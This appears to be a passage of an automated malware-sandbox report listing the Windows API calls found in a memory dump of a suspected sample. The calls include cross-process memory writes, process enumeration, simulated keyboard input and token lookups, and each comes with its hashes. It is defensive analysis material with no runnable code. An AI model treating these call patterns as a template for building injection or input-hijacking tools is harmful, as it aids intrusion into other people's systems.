                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: ERCP
                                                    • API String ID: 2532777613-1384759551
                                                    • Opcode ID: 1a3a7286374954a65170422add628bea0b143b386b89d27fefeef52cc6fb8af1
                                                    • Instruction ID: 410db9dd00d237edd7adb50d1e7847c34622090c0e61d4786fc7fde30030f28a
                                                    • Opcode Fuzzy Hash: 1a3a7286374954a65170422add628bea0b143b386b89d27fefeef52cc6fb8af1
                                                    • Instruction Fuzzy Hash: D151B4B1E007099BDB34CF64C8817AABBE4EF04324F14856EE84ADB291E774D585EB90
                                                    APIs
                                                      • Part of subcall function 00F51CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F49E4E,?,?,00000034,00000800,?,00000034), ref: 00F51CE5
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F4A3F7
                                                      • Part of subcall function 00F51C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F49E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00F51CB0
                                                      • Part of subcall function 00F51BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00F51C08
                                                      • Part of subcall function 00F51BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F49E12,00000034,?,?,00001004,00000000,00000000), ref: 00F51C18
                                                      • Part of subcall function 00F51BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F49E12,00000034,?,?,00001004,00000000,00000000), ref: 00F51C2E
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4A464
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4A4B1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 4543784cf0f26cbf2310aa53bc3955e08ded21ad26d5173bfa5eae041943c1fc
                                                    • Instruction ID: 757a7bd17995c2bfb19bd79728db02f1f3fef4bf1131ea02512b41820905e1c3
                                                    • Opcode Fuzzy Hash: 4543784cf0f26cbf2310aa53bc3955e08ded21ad26d5173bfa5eae041943c1fc
                                                    • Instruction Fuzzy Hash: 82416D7294021CBFCB20DBA4CC85BEEBBB8EF45310F004095FA45B7190DA716E89DBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F77A86
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F77A9A
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F77ABE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: b8c53bcb69de737fa6c6a54bf07877753fdb2f64ddbe5e8419e155add5cfbb1f
                                                    • Instruction ID: fc782c08c68c0f32e5699effd41f90fb69fe821b5418586587e3337f3c628a70
                                                    • Opcode Fuzzy Hash: b8c53bcb69de737fa6c6a54bf07877753fdb2f64ddbe5e8419e155add5cfbb1f
                                                    • Instruction Fuzzy Hash: 6A21D33265421CBFEF119F50CC42FEE3B69EF48724F114215FE186B190DA75A854AB90
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F7826F
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F7827D
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F78284
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 4bb0999f16b18dc7e132e22818ec7370a96b6f974557a1263adcb22acaefb54c
                                                    • Instruction ID: 03b99bcb7f3dafcefa43cd0d718033fe9223f7a9cd40aa514923ef8766a40f71
                                                    • Opcode Fuzzy Hash: 4bb0999f16b18dc7e132e22818ec7370a96b6f974557a1263adcb22acaefb54c
                                                    • Instruction Fuzzy Hash: B6217FB5A04208AFDB00DF54CCC5DA737EDEB4A3A4B14415AFA059B251CB70EC12EBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F77360
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F77370
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F77395
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 3b6a55a0ddecb97dd3b1875feb3d80a587f033e1a4f6321b5bb60a867856dd38
                                                    • Instruction ID: 263c62e575b98a025bd301dfe338d9783dca5ab610f5a173ea3d5de2af65f42f
                                                    • Opcode Fuzzy Hash: 3b6a55a0ddecb97dd3b1875feb3d80a587f033e1a4f6321b5bb60a867856dd38
                                                    • Instruction Fuzzy Hash: B921F532614208BFDF529F54CC85FBF37AAEF89764F00C125F9149B190DA71AC11ABA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F3027A,?), ref: 00F6C6E7
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F6C6F9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: c1d65677dc73bade11dacbfcd2cac42d9dbeb266fe4d37cd180d801f1e54b9f8
                                                    • Instruction ID: 6d2069b0254ae0e99f4f865030db1b912378c72ad9374bceb64de0b11d412e63
                                                    • Opcode Fuzzy Hash: c1d65677dc73bade11dacbfcd2cac42d9dbeb266fe4d37cd180d801f1e54b9f8
                                                    • Instruction Fuzzy Hash: D3E0C2B8A007138FD7205B25CC4DBA276D4FF04724BC0842AE8C5C2210DB70C840AF50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04AF7,?), ref: 00F04BB8
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04BCA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: bf461c163b3ebf9efb7742efc3b10e3902c90756795b9022bc9a88b2c68453b0
                                                    • Instruction ID: 8264a52cb3c425a6e18645077b53283d3d51da8fadcf2dd0631c09ff63076461
                                                    • Opcode Fuzzy Hash: bf461c163b3ebf9efb7742efc3b10e3902c90756795b9022bc9a88b2c68453b0
                                                    • Instruction Fuzzy Hash: 12D0C7B0800B128FD320AF30DC0CB8672E4AF00360F408C2AD882C2690EE70E880EB12
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04B44,?,00F049D4,?,?,00F027AF,?,00000001), ref: 00F04B85
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04B97
                                                     Memory Dump Source
                                                     • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F71696), ref: 00F71455
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F71467
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F05E3D), ref: 00F055FE
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F05610
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F693DE,?,00F80980), ref: 00F697D8
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F697EA
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F6E7A7
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F6E7EA
                                                      • Part of subcall function 00F6DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F6DEAE
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F6E9EA
                                                    • _memmove.LIBCMT ref: 00F6E9FD
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F687AD
                                                    • CoUninitialize.OLE32 ref: 00F687B8
                                                      • Part of subcall function 00F7DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00F68A0E,?,00000000), ref: 00F7DF71
                                                    • VariantInit.OLEAUT32(?), ref: 00F687C3
                                                    • VariantClear.OLEAUT32(?), ref: 00F68A94
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48308
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48320
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00F80988,000000FF,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48345
                                                    • _memcmp.LIBCMT ref: 00F48366
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6F526
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F6F534
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F6F5F4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F6F603
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F4A68A
                                                    • __itow.LIBCMT ref: 00F4A6BB
                                                      • Part of subcall function 00F4A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F4A976
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F4A724
                                                    • __itow.LIBCMT ref: 00F4A77B
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F670BC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F670CC
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F67130
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F6713C
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F80980), ref: 00F66B92
                                                    • _strlen.LIBCMT ref: 00F66BC4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F78F03
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 00F7B1D2
                                                    • GetWindowRect.USER32(?,?), ref: 00F7B248
                                                    • PtInRect.USER32(?,?,00F7C6BC), ref: 00F7B258
                                                    • MessageBeep.USER32(00000000), ref: 00F7B2C9
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F51326
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F51342
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F513A8
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F513FA
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    APIs
                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F51465
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F51481
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F514E0
                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F51532
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F2642B
                                                    • __isleadbyte_l.LIBCMT ref: 00F26459
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F26487
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F264BD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00F7553F
                                                      • Part of subcall function 00F53B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F53B4E
                                                      • Part of subcall function 00F53B34: GetCurrentThreadId.KERNEL32 ref: 00F53B55
                                                      • Part of subcall function 00F53B34: AttachThreadInput.USER32(00000000,?,00F555C0), ref: 00F53B5C
                                                    • GetCaretPos.USER32(?), ref: 00F75550
                                                    • ClientToScreen.USER32(00000000,?), ref: 00F7558B
                                                    • GetForegroundWindow.USER32 ref: 00F75591
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • GetCursorPos.USER32(?), ref: 00F7CB7A
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F2BCEC,?,?,?,?,?), ref: 00F7CB8F
                                                    • GetCursorPos.USER32(?), ref: 00F7CBDC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F2BCEC,?,?,?), ref: 00F7CC16
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00F10BE2
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F57E51,?,?,00000000), ref: 00F04041
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F57E51,?,?,00000000,?,?), ref: 00F04065
                                                    • _fprintf.LIBCMT ref: 00F10C19
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00F4694C
                                                      • Part of subcall function 00F14CCA: _flsall.LIBCMT ref: 00F14CE3
                                                    • __setmode.LIBCMT ref: 00F10C4E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    APIs
                                                      • Part of subcall function 00F48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F48D3F
                                                      • Part of subcall function 00F48D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D49
                                                      • Part of subcall function 00F48D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D58
                                                      • Part of subcall function 00F48D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D5F
                                                      • Part of subcall function 00F48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D75
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F492C1
                                                    • _memcmp.LIBCMT ref: 00F492E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F4931A
                                                    • HeapFree.KERNEL32(00000000), ref: 00F49321
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F763BD
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F763D7
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F763E5
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F763F3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    APIs
                                                      • Part of subcall function 00F4F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?), ref: 00F4F867
                                                      • Part of subcall function 00F4F858: lstrcpyW.KERNEL32(00000000,?,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4F88D
                                                      • Part of subcall function 00F4F858: lstrcmpiW.KERNEL32(00000000,?,00F4E46F,?,?,?,00F4F262,00000000,000000EF,00000119,?,?), ref: 00F4F8BE
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E488
                                                    • lstrcpyW.KERNEL32(00000000,?,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E4AE
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00F4E4E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 41c45824bd1ac8b5da25370c8eb22d8e7604ac68848a2575b831116a8e228cd3
                                                    • Instruction ID: ca79ad56df88a33d4b84adcfc7462822ce57dcae383a835717ebdca54ca3b3dd
                                                    • Opcode Fuzzy Hash: 41c45824bd1ac8b5da25370c8eb22d8e7604ac68848a2575b831116a8e228cd3
                                                    • Instruction Fuzzy Hash: D011933A500349AFDB259F24DC45DBA7BA9FF45360B40402AFC0ACB2A0EB759954E791
                                                    APIs
                                                    • _free.LIBCMT ref: 00F25331
                                                      • Part of subcall function 00F1593C: __FF_MSGBANNER.LIBCMT ref: 00F15953
                                                      • Part of subcall function 00F1593C: __NMSG_WRITE.LIBCMT ref: 00F1595A
                                                      • Part of subcall function 00F1593C: RtlAllocateHeap.NTDLL(01450000,00000000,00000001,?,00000004,?,?,00F11003,?), ref: 00F1597F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
